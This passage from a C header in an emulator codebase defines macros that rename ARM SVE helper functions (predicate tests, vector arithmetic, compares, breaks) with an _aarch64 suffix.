arm_handle_psci_call_aarch64 #define helper_sve_predtest1 helper_sve_predtest1_aarch64 #define helper_sve_predtest helper_sve_predtest_aarch64 #define helper_sve_and_pppp helper_sve_and_pppp_aarch64 #define helper_sve_bic_pppp helper_sve_bic_pppp_aarch64 #define helper_sve_eor_pppp helper_sve_eor_pppp_aarch64 #define helper_sve_sel_pppp helper_sve_sel_pppp_aarch64 #define helper_sve_orr_pppp helper_sve_orr_pppp_aarch64 #define helper_sve_orn_pppp helper_sve_orn_pppp_aarch64 #define helper_sve_nor_pppp helper_sve_nor_pppp_aarch64 #define helper_sve_nand_pppp helper_sve_nand_pppp_aarch64 #define helper_sve_and_zpzz_b helper_sve_and_zpzz_b_aarch64 #define helper_sve_and_zpzz_h helper_sve_and_zpzz_h_aarch64 #define helper_sve_and_zpzz_s helper_sve_and_zpzz_s_aarch64 #define helper_sve_and_zpzz_d helper_sve_and_zpzz_d_aarch64 #define helper_sve_orr_zpzz_b helper_sve_orr_zpzz_b_aarch64 #define helper_sve_orr_zpzz_h helper_sve_orr_zpzz_h_aarch64 #define helper_sve_orr_zpzz_s helper_sve_orr_zpzz_s_aarch64 #define helper_sve_orr_zpzz_d helper_sve_orr_zpzz_d_aarch64 #define helper_sve_eor_zpzz_b helper_sve_eor_zpzz_b_aarch64 #define helper_sve_eor_zpzz_h helper_sve_eor_zpzz_h_aarch64 #define helper_sve_eor_zpzz_s helper_sve_eor_zpzz_s_aarch64 #define helper_sve_eor_zpzz_d helper_sve_eor_zpzz_d_aarch64 #define helper_sve_bic_zpzz_b helper_sve_bic_zpzz_b_aarch64 #define helper_sve_bic_zpzz_h helper_sve_bic_zpzz_h_aarch64 #define helper_sve_bic_zpzz_s helper_sve_bic_zpzz_s_aarch64 #define helper_sve_bic_zpzz_d helper_sve_bic_zpzz_d_aarch64 #define helper_sve_add_zpzz_b helper_sve_add_zpzz_b_aarch64 #define helper_sve_add_zpzz_h helper_sve_add_zpzz_h_aarch64 #define helper_sve_add_zpzz_s helper_sve_add_zpzz_s_aarch64 #define helper_sve_add_zpzz_d helper_sve_add_zpzz_d_aarch64 #define helper_sve_sub_zpzz_b helper_sve_sub_zpzz_b_aarch64 #define helper_sve_sub_zpzz_h helper_sve_sub_zpzz_h_aarch64 #define helper_sve_sub_zpzz_s helper_sve_sub_zpzz_s_aarch64 #define helper_sve_sub_zpzz_d helper_sve_sub_zpzz_d_aarch64 #define helper_sve_smax_zpzz_b helper_sve_smax_zpzz_b_aarch64 #define helper_sve_smax_zpzz_h helper_sve_smax_zpzz_h_aarch64 #define helper_sve_smax_zpzz_s helper_sve_smax_zpzz_s_aarch64 #define helper_sve_smax_zpzz_d helper_sve_smax_zpzz_d_aarch64 #define helper_sve_umax_zpzz_b helper_sve_umax_zpzz_b_aarch64 #define helper_sve_umax_zpzz_h helper_sve_umax_zpzz_h_aarch64 #define helper_sve_umax_zpzz_s helper_sve_umax_zpzz_s_aarch64 #define helper_sve_umax_zpzz_d helper_sve_umax_zpzz_d_aarch64 #define helper_sve_smin_zpzz_b helper_sve_smin_zpzz_b_aarch64 #define helper_sve_smin_zpzz_h helper_sve_smin_zpzz_h_aarch64 #define helper_sve_smin_zpzz_s helper_sve_smin_zpzz_s_aarch64 #define helper_sve_smin_zpzz_d helper_sve_smin_zpzz_d_aarch64 #define helper_sve_umin_zpzz_b helper_sve_umin_zpzz_b_aarch64 #define helper_sve_umin_zpzz_h helper_sve_umin_zpzz_h_aarch64 #define helper_sve_umin_zpzz_s helper_sve_umin_zpzz_s_aarch64 #define helper_sve_umin_zpzz_d helper_sve_umin_zpzz_d_aarch64 #define helper_sve_sabd_zpzz_b helper_sve_sabd_zpzz_b_aarch64 #define helper_sve_sabd_zpzz_h helper_sve_sabd_zpzz_h_aarch64 #define helper_sve_sabd_zpzz_s helper_sve_sabd_zpzz_s_aarch64 #define helper_sve_sabd_zpzz_d helper_sve_sabd_zpzz_d_aarch64 #define helper_sve_uabd_zpzz_b helper_sve_uabd_zpzz_b_aarch64 #define helper_sve_uabd_zpzz_h helper_sve_uabd_zpzz_h_aarch64 #define helper_sve_uabd_zpzz_s helper_sve_uabd_zpzz_s_aarch64 #define helper_sve_uabd_zpzz_d helper_sve_uabd_zpzz_d_aarch64 #define helper_sve_mul_zpzz_b helper_sve_mul_zpzz_b_aarch64 #define helper_sve_mul_zpzz_h helper_sve_mul_zpzz_h_aarch64 #define helper_sve_mul_zpzz_s helper_sve_mul_zpzz_s_aarch64 #define helper_sve_mul_zpzz_d helper_sve_mul_zpzz_d_aarch64 #define helper_sve_smulh_zpzz_b helper_sve_smulh_zpzz_b_aarch64 #define helper_sve_smulh_zpzz_h helper_sve_smulh_zpzz_h_aarch64 #define helper_sve_smulh_zpzz_s helper_sve_smulh_zpzz_s_aarch64 #define helper_sve_smulh_zpzz_d helper_sve_smulh_zpzz_d_aarch64 #define helper_sve_umulh_zpzz_b helper_sve_umulh_zpzz_b_aarch64 #define helper_sve_umulh_zpzz_h helper_sve_umulh_zpzz_h_aarch64 #define helper_sve_umulh_zpzz_s helper_sve_umulh_zpzz_s_aarch64 #define helper_sve_umulh_zpzz_d helper_sve_umulh_zpzz_d_aarch64 #define helper_sve_sdiv_zpzz_s helper_sve_sdiv_zpzz_s_aarch64 #define helper_sve_sdiv_zpzz_d helper_sve_sdiv_zpzz_d_aarch64 #define helper_sve_udiv_zpzz_s helper_sve_udiv_zpzz_s_aarch64 #define helper_sve_udiv_zpzz_d helper_sve_udiv_zpzz_d_aarch64 #define helper_sve_asr_zpzz_b helper_sve_asr_zpzz_b_aarch64 #define helper_sve_lsr_zpzz_b helper_sve_lsr_zpzz_b_aarch64 #define helper_sve_lsl_zpzz_b helper_sve_lsl_zpzz_b_aarch64 #define helper_sve_asr_zpzz_h helper_sve_asr_zpzz_h_aarch64 #define helper_sve_lsr_zpzz_h helper_sve_lsr_zpzz_h_aarch64 #define helper_sve_lsl_zpzz_h helper_sve_lsl_zpzz_h_aarch64 #define helper_sve_asr_zpzz_s helper_sve_asr_zpzz_s_aarch64 #define helper_sve_lsr_zpzz_s helper_sve_lsr_zpzz_s_aarch64 #define helper_sve_lsl_zpzz_s helper_sve_lsl_zpzz_s_aarch64 #define helper_sve_asr_zpzz_d helper_sve_asr_zpzz_d_aarch64 #define helper_sve_lsr_zpzz_d helper_sve_lsr_zpzz_d_aarch64 #define helper_sve_lsl_zpzz_d helper_sve_lsl_zpzz_d_aarch64 #define helper_sve_asr_zpzw_b helper_sve_asr_zpzw_b_aarch64 #define helper_sve_lsr_zpzw_b helper_sve_lsr_zpzw_b_aarch64 #define helper_sve_lsl_zpzw_b helper_sve_lsl_zpzw_b_aarch64 #define helper_sve_asr_zpzw_h helper_sve_asr_zpzw_h_aarch64 #define helper_sve_lsr_zpzw_h helper_sve_lsr_zpzw_h_aarch64 #define helper_sve_lsl_zpzw_h helper_sve_lsl_zpzw_h_aarch64 #define helper_sve_asr_zpzw_s helper_sve_asr_zpzw_s_aarch64 #define helper_sve_lsr_zpzw_s helper_sve_lsr_zpzw_s_aarch64 #define helper_sve_lsl_zpzw_s helper_sve_lsl_zpzw_s_aarch64 #define helper_sve_cls_b helper_sve_cls_b_aarch64 #define helper_sve_cls_h helper_sve_cls_h_aarch64 #define helper_sve_cls_s helper_sve_cls_s_aarch64 #define helper_sve_cls_d helper_sve_cls_d_aarch64 #define helper_sve_clz_b helper_sve_clz_b_aarch64 #define helper_sve_clz_h helper_sve_clz_h_aarch64 #define helper_sve_clz_s helper_sve_clz_s_aarch64 #define helper_sve_clz_d helper_sve_clz_d_aarch64 #define helper_sve_cnt_zpz_b helper_sve_cnt_zpz_b_aarch64 #define helper_sve_cnt_zpz_h helper_sve_cnt_zpz_h_aarch64 #define helper_sve_cnt_zpz_s helper_sve_cnt_zpz_s_aarch64 #define helper_sve_cnt_zpz_d helper_sve_cnt_zpz_d_aarch64 #define helper_sve_cnot_b helper_sve_cnot_b_aarch64 #define helper_sve_cnot_h helper_sve_cnot_h_aarch64 #define helper_sve_cnot_s helper_sve_cnot_s_aarch64 #define helper_sve_cnot_d helper_sve_cnot_d_aarch64 #define helper_sve_fabs_h helper_sve_fabs_h_aarch64 #define helper_sve_fabs_s helper_sve_fabs_s_aarch64 #define helper_sve_fabs_d helper_sve_fabs_d_aarch64 #define helper_sve_fneg_h helper_sve_fneg_h_aarch64 #define helper_sve_fneg_s helper_sve_fneg_s_aarch64 #define helper_sve_fneg_d helper_sve_fneg_d_aarch64 #define helper_sve_not_zpz_b helper_sve_not_zpz_b_aarch64 #define helper_sve_not_zpz_h helper_sve_not_zpz_h_aarch64 #define helper_sve_not_zpz_s helper_sve_not_zpz_s_aarch64 #define helper_sve_not_zpz_d helper_sve_not_zpz_d_aarch64 #define helper_sve_sxtb_h helper_sve_sxtb_h_aarch64 #define helper_sve_sxtb_s helper_sve_sxtb_s_aarch64 #define helper_sve_sxth_s helper_sve_sxth_s_aarch64 #define helper_sve_sxtb_d helper_sve_sxtb_d_aarch64 #define helper_sve_sxth_d helper_sve_sxth_d_aarch64 #define helper_sve_sxtw_d helper_sve_sxtw_d_aarch64 #define helper_sve_uxtb_h helper_sve_uxtb_h_aarch64 #define helper_sve_uxtb_s helper_sve_uxtb_s_aarch64 #define helper_sve_uxth_s helper_sve_uxth_s_aarch64 #define helper_sve_uxtb_d helper_sve_uxtb_d_aarch64 #define helper_sve_uxth_d helper_sve_uxth_d_aarch64 #define helper_sve_uxtw_d helper_sve_uxtw_d_aarch64 #define helper_sve_abs_b helper_sve_abs_b_aarch64 #define helper_sve_abs_h helper_sve_abs_h_aarch64 #define helper_sve_abs_s helper_sve_abs_s_aarch64 #define helper_sve_abs_d helper_sve_abs_d_aarch64 #define helper_sve_neg_b helper_sve_neg_b_aarch64 #define helper_sve_neg_h helper_sve_neg_h_aarch64 #define helper_sve_neg_s helper_sve_neg_s_aarch64 #define helper_sve_neg_d helper_sve_neg_d_aarch64 #define helper_sve_revb_h helper_sve_revb_h_aarch64 #define helper_sve_revb_s helper_sve_revb_s_aarch64 #define helper_sve_revb_d helper_sve_revb_d_aarch64 #define helper_sve_revh_s helper_sve_revh_s_aarch64 #define helper_sve_revh_d helper_sve_revh_d_aarch64 #define helper_sve_revw_d helper_sve_revw_d_aarch64 #define helper_sve_rbit_b helper_sve_rbit_b_aarch64 #define helper_sve_rbit_h helper_sve_rbit_h_aarch64 #define helper_sve_rbit_s helper_sve_rbit_s_aarch64 #define helper_sve_rbit_d helper_sve_rbit_d_aarch64 #define helper_sve_asr_zzw_b helper_sve_asr_zzw_b_aarch64 #define helper_sve_lsr_zzw_b helper_sve_lsr_zzw_b_aarch64 #define helper_sve_lsl_zzw_b helper_sve_lsl_zzw_b_aarch64 #define helper_sve_asr_zzw_h helper_sve_asr_zzw_h_aarch64 #define helper_sve_lsr_zzw_h helper_sve_lsr_zzw_h_aarch64 #define helper_sve_lsl_zzw_h helper_sve_lsl_zzw_h_aarch64 #define helper_sve_asr_zzw_s helper_sve_asr_zzw_s_aarch64 #define helper_sve_lsr_zzw_s helper_sve_lsr_zzw_s_aarch64 #define helper_sve_lsl_zzw_s helper_sve_lsl_zzw_s_aarch64 #define helper_sve_orv_b helper_sve_orv_b_aarch64 #define helper_sve_orv_h helper_sve_orv_h_aarch64 #define helper_sve_orv_s helper_sve_orv_s_aarch64 #define helper_sve_orv_d helper_sve_orv_d_aarch64 #define helper_sve_eorv_b helper_sve_eorv_b_aarch64 #define helper_sve_eorv_h helper_sve_eorv_h_aarch64 #define helper_sve_eorv_s helper_sve_eorv_s_aarch64 #define helper_sve_eorv_d helper_sve_eorv_d_aarch64 #define helper_sve_andv_b helper_sve_andv_b_aarch64 #define helper_sve_andv_h helper_sve_andv_h_aarch64 #define helper_sve_andv_s helper_sve_andv_s_aarch64 #define helper_sve_andv_d helper_sve_andv_d_aarch64 #define helper_sve_saddv_b helper_sve_saddv_b_aarch64 #define helper_sve_saddv_h helper_sve_saddv_h_aarch64 #define helper_sve_saddv_s helper_sve_saddv_s_aarch64 #define helper_sve_uaddv_b helper_sve_uaddv_b_aarch64 #define helper_sve_uaddv_h helper_sve_uaddv_h_aarch64 #define helper_sve_uaddv_s helper_sve_uaddv_s_aarch64 #define helper_sve_uaddv_d helper_sve_uaddv_d_aarch64 #define helper_sve_smaxv_b helper_sve_smaxv_b_aarch64 #define helper_sve_smaxv_h helper_sve_smaxv_h_aarch64 #define helper_sve_smaxv_s helper_sve_smaxv_s_aarch64 #define helper_sve_smaxv_d helper_sve_smaxv_d_aarch64 #define helper_sve_umaxv_b helper_sve_umaxv_b_aarch64 #define helper_sve_umaxv_h helper_sve_umaxv_h_aarch64 #define helper_sve_umaxv_s helper_sve_umaxv_s_aarch64 #define helper_sve_umaxv_d helper_sve_umaxv_d_aarch64 #define helper_sve_sminv_b helper_sve_sminv_b_aarch64 #define helper_sve_sminv_h helper_sve_sminv_h_aarch64 #define helper_sve_sminv_s helper_sve_sminv_s_aarch64 #define helper_sve_sminv_d helper_sve_sminv_d_aarch64 #define helper_sve_uminv_b helper_sve_uminv_b_aarch64 #define helper_sve_uminv_h helper_sve_uminv_h_aarch64 #define helper_sve_uminv_s helper_sve_uminv_s_aarch64 #define helper_sve_uminv_d helper_sve_uminv_d_aarch64 #define helper_sve_subri_b helper_sve_subri_b_aarch64 #define helper_sve_subri_h helper_sve_subri_h_aarch64 #define helper_sve_subri_s helper_sve_subri_s_aarch64 #define helper_sve_subri_d helper_sve_subri_d_aarch64 #define helper_sve_smaxi_b helper_sve_smaxi_b_aarch64 #define helper_sve_smaxi_h helper_sve_smaxi_h_aarch64 #define helper_sve_smaxi_s helper_sve_smaxi_s_aarch64 #define helper_sve_smaxi_d helper_sve_smaxi_d_aarch64 #define helper_sve_smini_b helper_sve_smini_b_aarch64 #define helper_sve_smini_h helper_sve_smini_h_aarch64 #define helper_sve_smini_s helper_sve_smini_s_aarch64 #define helper_sve_smini_d helper_sve_smini_d_aarch64 #define helper_sve_umaxi_b helper_sve_umaxi_b_aarch64 #define helper_sve_umaxi_h helper_sve_umaxi_h_aarch64 #define helper_sve_umaxi_s helper_sve_umaxi_s_aarch64 #define helper_sve_umaxi_d helper_sve_umaxi_d_aarch64 #define helper_sve_umini_b helper_sve_umini_b_aarch64 #define helper_sve_umini_h helper_sve_umini_h_aarch64 #define helper_sve_umini_s helper_sve_umini_s_aarch64 #define helper_sve_umini_d helper_sve_umini_d_aarch64 #define helper_sve_pfirst helper_sve_pfirst_aarch64 #define helper_sve_pnext helper_sve_pnext_aarch64 #define helper_sve_clr_b helper_sve_clr_b_aarch64 #define helper_sve_clr_h helper_sve_clr_h_aarch64 #define helper_sve_clr_s helper_sve_clr_s_aarch64 #define helper_sve_clr_d helper_sve_clr_d_aarch64 #define helper_sve_movz_b helper_sve_movz_b_aarch64 #define helper_sve_movz_h helper_sve_movz_h_aarch64 #define helper_sve_movz_s helper_sve_movz_s_aarch64 #define helper_sve_movz_d helper_sve_movz_d_aarch64 #define helper_sve_asr_zpzi_b helper_sve_asr_zpzi_b_aarch64 #define helper_sve_asr_zpzi_h helper_sve_asr_zpzi_h_aarch64 #define helper_sve_asr_zpzi_s helper_sve_asr_zpzi_s_aarch64 #define helper_sve_asr_zpzi_d helper_sve_asr_zpzi_d_aarch64 #define helper_sve_lsr_zpzi_b helper_sve_lsr_zpzi_b_aarch64 #define helper_sve_lsr_zpzi_h helper_sve_lsr_zpzi_h_aarch64 #define helper_sve_lsr_zpzi_s helper_sve_lsr_zpzi_s_aarch64 #define helper_sve_lsr_zpzi_d helper_sve_lsr_zpzi_d_aarch64 #define helper_sve_lsl_zpzi_b helper_sve_lsl_zpzi_b_aarch64 #define helper_sve_lsl_zpzi_h helper_sve_lsl_zpzi_h_aarch64 #define helper_sve_lsl_zpzi_s helper_sve_lsl_zpzi_s_aarch64 #define helper_sve_lsl_zpzi_d helper_sve_lsl_zpzi_d_aarch64 #define helper_sve_asrd_b helper_sve_asrd_b_aarch64 #define helper_sve_asrd_h helper_sve_asrd_h_aarch64 #define helper_sve_asrd_s helper_sve_asrd_s_aarch64 #define helper_sve_asrd_d helper_sve_asrd_d_aarch64 #define helper_sve_mla_b helper_sve_mla_b_aarch64 #define helper_sve_mls_b helper_sve_mls_b_aarch64 #define helper_sve_mla_h helper_sve_mla_h_aarch64 #define helper_sve_mls_h helper_sve_mls_h_aarch64 #define helper_sve_mla_s helper_sve_mla_s_aarch64 #define helper_sve_mls_s helper_sve_mls_s_aarch64 #define helper_sve_mla_d helper_sve_mla_d_aarch64 #define helper_sve_mls_d helper_sve_mls_d_aarch64 #define helper_sve_index_b helper_sve_index_b_aarch64 #define helper_sve_index_h helper_sve_index_h_aarch64 #define helper_sve_index_s helper_sve_index_s_aarch64 #define helper_sve_index_d helper_sve_index_d_aarch64 #define helper_sve_adr_p32 helper_sve_adr_p32_aarch64 #define helper_sve_adr_p64 helper_sve_adr_p64_aarch64 #define helper_sve_adr_s32 helper_sve_adr_s32_aarch64 #define helper_sve_adr_u32 helper_sve_adr_u32_aarch64 #define helper_sve_fexpa_h helper_sve_fexpa_h_aarch64 #define helper_sve_fexpa_s helper_sve_fexpa_s_aarch64 #define helper_sve_fexpa_d helper_sve_fexpa_d_aarch64 #define helper_sve_ftssel_h helper_sve_ftssel_h_aarch64 #define helper_sve_ftssel_s helper_sve_ftssel_s_aarch64 #define helper_sve_ftssel_d helper_sve_ftssel_d_aarch64 #define helper_sve_sqaddi_b helper_sve_sqaddi_b_aarch64 #define helper_sve_sqaddi_h helper_sve_sqaddi_h_aarch64 #define helper_sve_sqaddi_s helper_sve_sqaddi_s_aarch64 #define helper_sve_sqaddi_d helper_sve_sqaddi_d_aarch64 #define helper_sve_uqaddi_b helper_sve_uqaddi_b_aarch64 #define helper_sve_uqaddi_h helper_sve_uqaddi_h_aarch64 #define helper_sve_uqaddi_s helper_sve_uqaddi_s_aarch64 #define helper_sve_uqaddi_d helper_sve_uqaddi_d_aarch64 #define helper_sve_uqsubi_d helper_sve_uqsubi_d_aarch64 #define helper_sve_cpy_m_b helper_sve_cpy_m_b_aarch64 #define helper_sve_cpy_m_h helper_sve_cpy_m_h_aarch64 #define helper_sve_cpy_m_s helper_sve_cpy_m_s_aarch64 #define helper_sve_cpy_m_d helper_sve_cpy_m_d_aarch64 #define helper_sve_cpy_z_b helper_sve_cpy_z_b_aarch64 #define helper_sve_cpy_z_h helper_sve_cpy_z_h_aarch64 #define helper_sve_cpy_z_s helper_sve_cpy_z_s_aarch64 #define helper_sve_cpy_z_d helper_sve_cpy_z_d_aarch64 #define helper_sve_ext helper_sve_ext_aarch64 #define helper_sve_insr_b helper_sve_insr_b_aarch64 #define helper_sve_insr_h helper_sve_insr_h_aarch64 #define helper_sve_insr_s helper_sve_insr_s_aarch64 #define helper_sve_insr_d helper_sve_insr_d_aarch64 #define helper_sve_rev_b helper_sve_rev_b_aarch64 #define helper_sve_rev_h helper_sve_rev_h_aarch64 #define helper_sve_rev_s helper_sve_rev_s_aarch64 #define helper_sve_rev_d helper_sve_rev_d_aarch64 #define helper_sve_tbl_b helper_sve_tbl_b_aarch64 #define helper_sve_tbl_h helper_sve_tbl_h_aarch64 #define helper_sve_tbl_s helper_sve_tbl_s_aarch64 #define helper_sve_tbl_d helper_sve_tbl_d_aarch64 #define helper_sve_sunpk_h helper_sve_sunpk_h_aarch64 #define helper_sve_sunpk_s helper_sve_sunpk_s_aarch64 #define helper_sve_sunpk_d helper_sve_sunpk_d_aarch64 #define helper_sve_uunpk_h helper_sve_uunpk_h_aarch64 #define helper_sve_uunpk_s helper_sve_uunpk_s_aarch64 #define helper_sve_uunpk_d helper_sve_uunpk_d_aarch64 #define helper_sve_zip_p helper_sve_zip_p_aarch64 #define helper_sve_uzp_p helper_sve_uzp_p_aarch64 #define helper_sve_trn_p helper_sve_trn_p_aarch64 #define helper_sve_rev_p helper_sve_rev_p_aarch64 #define helper_sve_punpk_p helper_sve_punpk_p_aarch64 #define helper_sve_zip_b helper_sve_zip_b_aarch64 #define helper_sve_zip_h helper_sve_zip_h_aarch64 #define helper_sve_zip_s helper_sve_zip_s_aarch64 #define helper_sve_zip_d helper_sve_zip_d_aarch64 #define helper_sve_uzp_b helper_sve_uzp_b_aarch64 #define helper_sve_uzp_h helper_sve_uzp_h_aarch64 #define helper_sve_uzp_s helper_sve_uzp_s_aarch64 #define helper_sve_uzp_d helper_sve_uzp_d_aarch64 #define helper_sve_trn_b helper_sve_trn_b_aarch64 #define helper_sve_trn_h helper_sve_trn_h_aarch64 #define helper_sve_trn_s helper_sve_trn_s_aarch64 #define helper_sve_trn_d helper_sve_trn_d_aarch64 #define helper_sve_compact_s helper_sve_compact_s_aarch64 #define helper_sve_compact_d helper_sve_compact_d_aarch64 #define helper_sve_last_active_element helper_sve_last_active_element_aarch64 #define helper_sve_splice helper_sve_splice_aarch64 #define helper_sve_sel_zpzz_b helper_sve_sel_zpzz_b_aarch64 #define helper_sve_sel_zpzz_h helper_sve_sel_zpzz_h_aarch64 #define helper_sve_sel_zpzz_s helper_sve_sel_zpzz_s_aarch64 #define helper_sve_sel_zpzz_d helper_sve_sel_zpzz_d_aarch64 #define helper_sve_cmpeq_ppzz_b helper_sve_cmpeq_ppzz_b_aarch64 #define helper_sve_cmpeq_ppzz_h helper_sve_cmpeq_ppzz_h_aarch64 #define helper_sve_cmpeq_ppzz_s helper_sve_cmpeq_ppzz_s_aarch64 #define helper_sve_cmpeq_ppzz_d helper_sve_cmpeq_ppzz_d_aarch64 #define helper_sve_cmpne_ppzz_b helper_sve_cmpne_ppzz_b_aarch64 #define helper_sve_cmpne_ppzz_h helper_sve_cmpne_ppzz_h_aarch64 #define helper_sve_cmpne_ppzz_s helper_sve_cmpne_ppzz_s_aarch64 #define helper_sve_cmpne_ppzz_d helper_sve_cmpne_ppzz_d_aarch64 #define helper_sve_cmpgt_ppzz_b helper_sve_cmpgt_ppzz_b_aarch64 #define helper_sve_cmpgt_ppzz_h helper_sve_cmpgt_ppzz_h_aarch64 #define helper_sve_cmpgt_ppzz_s helper_sve_cmpgt_ppzz_s_aarch64 #define helper_sve_cmpgt_ppzz_d helper_sve_cmpgt_ppzz_d_aarch64 #define helper_sve_cmpge_ppzz_b helper_sve_cmpge_ppzz_b_aarch64 #define helper_sve_cmpge_ppzz_h helper_sve_cmpge_ppzz_h_aarch64 #define helper_sve_cmpge_ppzz_s helper_sve_cmpge_ppzz_s_aarch64 #define helper_sve_cmpge_ppzz_d helper_sve_cmpge_ppzz_d_aarch64 #define helper_sve_cmphi_ppzz_b helper_sve_cmphi_ppzz_b_aarch64 #define helper_sve_cmphi_ppzz_h helper_sve_cmphi_ppzz_h_aarch64 #define helper_sve_cmphi_ppzz_s helper_sve_cmphi_ppzz_s_aarch64 #define helper_sve_cmphi_ppzz_d helper_sve_cmphi_ppzz_d_aarch64 #define helper_sve_cmphs_ppzz_b helper_sve_cmphs_ppzz_b_aarch64 #define helper_sve_cmphs_ppzz_h helper_sve_cmphs_ppzz_h_aarch64 #define helper_sve_cmphs_ppzz_s helper_sve_cmphs_ppzz_s_aarch64 #define helper_sve_cmphs_ppzz_d helper_sve_cmphs_ppzz_d_aarch64 #define helper_sve_cmpeq_ppzw_b helper_sve_cmpeq_ppzw_b_aarch64 #define helper_sve_cmpeq_ppzw_h helper_sve_cmpeq_ppzw_h_aarch64 #define helper_sve_cmpeq_ppzw_s helper_sve_cmpeq_ppzw_s_aarch64 #define helper_sve_cmpne_ppzw_b helper_sve_cmpne_ppzw_b_aarch64 #define helper_sve_cmpne_ppzw_h helper_sve_cmpne_ppzw_h_aarch64 #define helper_sve_cmpne_ppzw_s helper_sve_cmpne_ppzw_s_aarch64 #define helper_sve_cmpgt_ppzw_b helper_sve_cmpgt_ppzw_b_aarch64 #define helper_sve_cmpgt_ppzw_h helper_sve_cmpgt_ppzw_h_aarch64 #define helper_sve_cmpgt_ppzw_s helper_sve_cmpgt_ppzw_s_aarch64 #define helper_sve_cmpge_ppzw_b helper_sve_cmpge_ppzw_b_aarch64 #define helper_sve_cmpge_ppzw_h helper_sve_cmpge_ppzw_h_aarch64 #define helper_sve_cmpge_ppzw_s helper_sve_cmpge_ppzw_s_aarch64 #define helper_sve_cmphi_ppzw_b helper_sve_cmphi_ppzw_b_aarch64 #define helper_sve_cmphi_ppzw_h helper_sve_cmphi_ppzw_h_aarch64 #define helper_sve_cmphi_ppzw_s helper_sve_cmphi_ppzw_s_aarch64 #define helper_sve_cmphs_ppzw_b helper_sve_cmphs_ppzw_b_aarch64 #define helper_sve_cmphs_ppzw_h helper_sve_cmphs_ppzw_h_aarch64 #define helper_sve_cmphs_ppzw_s helper_sve_cmphs_ppzw_s_aarch64 #define helper_sve_cmplt_ppzw_b helper_sve_cmplt_ppzw_b_aarch64 #define helper_sve_cmplt_ppzw_h helper_sve_cmplt_ppzw_h_aarch64 #define helper_sve_cmplt_ppzw_s helper_sve_cmplt_ppzw_s_aarch64 #define helper_sve_cmple_ppzw_b helper_sve_cmple_ppzw_b_aarch64 #define helper_sve_cmple_ppzw_h helper_sve_cmple_ppzw_h_aarch64 #define helper_sve_cmple_ppzw_s helper_sve_cmple_ppzw_s_aarch64 #define helper_sve_cmplo_ppzw_b helper_sve_cmplo_ppzw_b_aarch64 #define helper_sve_cmplo_ppzw_h helper_sve_cmplo_ppzw_h_aarch64 #define helper_sve_cmplo_ppzw_s helper_sve_cmplo_ppzw_s_aarch64 #define helper_sve_cmpls_ppzw_b helper_sve_cmpls_ppzw_b_aarch64 #define helper_sve_cmpls_ppzw_h helper_sve_cmpls_ppzw_h_aarch64 #define helper_sve_cmpls_ppzw_s helper_sve_cmpls_ppzw_s_aarch64 #define helper_sve_cmpeq_ppzi_b helper_sve_cmpeq_ppzi_b_aarch64 #define helper_sve_cmpeq_ppzi_h helper_sve_cmpeq_ppzi_h_aarch64 #define helper_sve_cmpeq_ppzi_s helper_sve_cmpeq_ppzi_s_aarch64 #define helper_sve_cmpeq_ppzi_d helper_sve_cmpeq_ppzi_d_aarch64 #define helper_sve_cmpne_ppzi_b helper_sve_cmpne_ppzi_b_aarch64 #define helper_sve_cmpne_ppzi_h helper_sve_cmpne_ppzi_h_aarch64 #define helper_sve_cmpne_ppzi_s helper_sve_cmpne_ppzi_s_aarch64 #define helper_sve_cmpne_ppzi_d helper_sve_cmpne_ppzi_d_aarch64 #define helper_sve_cmpgt_ppzi_b helper_sve_cmpgt_ppzi_b_aarch64 #define helper_sve_cmpgt_ppzi_h helper_sve_cmpgt_ppzi_h_aarch64 #define helper_sve_cmpgt_ppzi_s helper_sve_cmpgt_ppzi_s_aarch64 #define helper_sve_cmpgt_ppzi_d helper_sve_cmpgt_ppzi_d_aarch64 #define helper_sve_cmpge_ppzi_b helper_sve_cmpge_ppzi_b_aarch64 #define helper_sve_cmpge_ppzi_h helper_sve_cmpge_ppzi_h_aarch64 #define helper_sve_cmpge_ppzi_s helper_sve_cmpge_ppzi_s_aarch64 #define helper_sve_cmpge_ppzi_d helper_sve_cmpge_ppzi_d_aarch64 #define helper_sve_cmphi_ppzi_b helper_sve_cmphi_ppzi_b_aarch64 #define helper_sve_cmphi_ppzi_h helper_sve_cmphi_ppzi_h_aarch64 #define helper_sve_cmphi_ppzi_s helper_sve_cmphi_ppzi_s_aarch64 #define helper_sve_cmphi_ppzi_d helper_sve_cmphi_ppzi_d_aarch64 #define helper_sve_cmphs_ppzi_b helper_sve_cmphs_ppzi_b_aarch64 #define helper_sve_cmphs_ppzi_h helper_sve_cmphs_ppzi_h_aarch64 #define helper_sve_cmphs_ppzi_s helper_sve_cmphs_ppzi_s_aarch64 #define helper_sve_cmphs_ppzi_d helper_sve_cmphs_ppzi_d_aarch64 #define helper_sve_cmplt_ppzi_b helper_sve_cmplt_ppzi_b_aarch64 #define helper_sve_cmplt_ppzi_h helper_sve_cmplt_ppzi_h_aarch64 #define helper_sve_cmplt_ppzi_s helper_sve_cmplt_ppzi_s_aarch64 #define helper_sve_cmplt_ppzi_d helper_sve_cmplt_ppzi_d_aarch64 #define helper_sve_cmple_ppzi_b helper_sve_cmple_ppzi_b_aarch64 #define helper_sve_cmple_ppzi_h helper_sve_cmple_ppzi_h_aarch64 #define helper_sve_cmple_ppzi_s helper_sve_cmple_ppzi_s_aarch64 #define helper_sve_cmple_ppzi_d helper_sve_cmple_ppzi_d_aarch64 #define helper_sve_cmplo_ppzi_b helper_sve_cmplo_ppzi_b_aarch64 #define helper_sve_cmplo_ppzi_h helper_sve_cmplo_ppzi_h_aarch64 #define helper_sve_cmplo_ppzi_s helper_sve_cmplo_ppzi_s_aarch64 #define helper_sve_cmplo_ppzi_d helper_sve_cmplo_ppzi_d_aarch64 #define helper_sve_cmpls_ppzi_b helper_sve_cmpls_ppzi_b_aarch64 #define helper_sve_cmpls_ppzi_h helper_sve_cmpls_ppzi_h_aarch64 #define helper_sve_cmpls_ppzi_s helper_sve_cmpls_ppzi_s_aarch64 #define helper_sve_cmpls_ppzi_d helper_sve_cmpls_ppzi_d_aarch64 #define helper_sve_brkpa helper_sve_brkpa_aarch64 #define helper_sve_brkpas helper_sve_brkpas_aarch64 #define helper_sve_brkpb helper_sve_brkpb_aarch64 #define helper_sve_brkpbs helper_sve_brkpbs_aarch64 #define helper_sve_brka_z helper_sve_brka_z_aarch64 #define helper_sve_brkas_z helper_sve_brkas_z_aarch64 #define helper_sve_brkb_z helper_sve_brkb_z_aarch64 #define helper_sve_brkbs_z helper_sve_brkbs_z_aarch64 #define helper_sve_brka_m helper_sve_brka_m_aarch64 #define helper_sve_brkas_m helper_sve_brkas_m_aarch64 #define helper_sve_brkb_m helper_sve_brkb_m_aarch64 